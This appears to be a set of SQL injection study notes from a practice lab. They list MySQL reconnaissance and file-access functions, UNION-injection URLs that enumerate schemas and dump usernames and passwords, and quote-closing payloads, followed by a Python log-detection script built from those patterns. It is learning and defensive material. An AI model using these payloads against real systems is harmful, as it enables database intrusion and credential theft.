1. Basic SQL statements
Comments
Single-line comments:
# (URL-encoded as %23)
--+ (-- followed by a space; the + decodes to a space in a URL)
Multi-line comments:
/**/
SELECT(VERSION())                  check the database version
SELECT(USER())                     check the current user
SELECT(DATABASE())                 check the database
SELECT(@@datadir)                  check the database path
SELECT(@@version_compile_os)       check the system version
version()                          database version
load_file()                        read a file
current_user()                     current user name (can be used to check privileges)
into outfile / into dumpfile       write a file
show databases;
use security;
show tables;
select username,password from users;
use information_schema;
show tables;
desc tables;
select schema_name from information_schema.schemata;                               check all the databases
select table_name from information_schema.tables where table_schema="security";    check the tables
select column_name from information_schema.columns where table_name="users";       check the columns
select username,password from security.users where id=10;                          check the column contents
2. Notes: basic UNION injection
The injected code is the
1. Querying the current database and user
http://10.1.2.5:10631/sqli/Less-2/?id=-1 union select 1,user(),version()
2. Querying all databases
http://10.1.2.5:10631/sqli/Less-2/?id=-1 union select 1,database(),group_concat(schema_name) from information_schema.schemata
3. Check all table names under a database
http://10.1.2.5:10631/sqli/Less-2/?id=-1 union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema='security'
4. Check all column (field) names under a table
http://10.1.2.5:10631/sqli/Less-2/?id=-1 union select 1,database(),group_concat(column_name) from information_schema.columns where table_name='users'
5. Querying the contents of a field
http://10.1.2.5:10631/sqli/Less-2/?id=-1 union select 1,database(),group_concat(id,'--',username,'--',password) from users
Some sneaky tricks:
http://10.1.2.5:10631/sqli/Less-2/?id=2 union select 1,version(),3 order by 2
1. Common closing characters
Closing methods for the numeric type and the character type:
How id is wrapped in the query      Closing payload
'id'                                ' and 1=1--+
"id"                                " and 1=1--+
("id")                              ") and 1=1--+
('id')                              ') and 1=1--+
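
Seen from the defender's side, the statements in sections 1 and 2 leave recognisable traces in web request logs. The following is an added example, not part of the original notes: it decodes each query-string parameter (so %23 and + become # and a space) and flags the patterns listed above. The rule names, the classify helper and the sample requests are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Indicators derived from the statements listed in these notes (assumed rule names).
RULES = {
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b"),
    "schema_enum": re.compile(r"\binformation_schema\b"),
    "file_access": re.compile(r"\bload_file\s*\(|\binto\s+(outfile|dumpfile)\b"),
    "recon_function": re.compile(
        r"\b(version|user|database|current_user)\s*\(|@@\s*(datadir|version_compile_os)"),
    # A parameter value that ends in a comment marker cuts off the rest of the query.
    "comment_terminator": re.compile(r"(?:--|#)\s*$"),
    # "and 1=1" style probes used to test a closing character.
    "tautology": re.compile(r"\b(and|or)\s+(\d+)\s*=\s*\2\b"),
}

def normalise(value):
    """Lower-case, turn /**/ comments into a space, collapse runs of whitespace."""
    value = re.sub(r"/\*.*?\*/", " ", value.lower(), flags=re.S)
    return re.sub(r"\s+", " ", value)

def classify(request_target):
    """Return the sorted names of all rules hit by any query-string parameter."""
    hits = set()
    query = urlsplit(request_target).query
    # parse_qsl percent-decodes values and maps '+' to a space, as the server does.
    for _name, value in parse_qsl(query, keep_blank_values=True):
        text = normalise(value)
        hits.update(rule for rule, rx in RULES.items() if rx.search(text))
    return sorted(hits)

# Constructed request targets modelled on the lab URLs in these notes.
SAMPLES = [
    "/sqli/Less-2/?id=2",
    "/sqli/Less-2/?id=-1%20union%20select%201,user(),version()",
    "/sqli/Less-2/?id=-1+union+select+1,database(),group_concat(schema_name)"
    "+from+information_schema.schemata",
    "/sqli/Less-2/?id=1%27+and+1=1--+",
]

if __name__ == "__main__":
    for target in SAMPLES:
        print(classify(target) or ["clean"], target)
```

Pattern matching of this kind is a detection aid for log review or a WAF rule; the fix for the injectable parameter itself is a parameterized query.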
Foundation of SQL injection for Web Security Foundation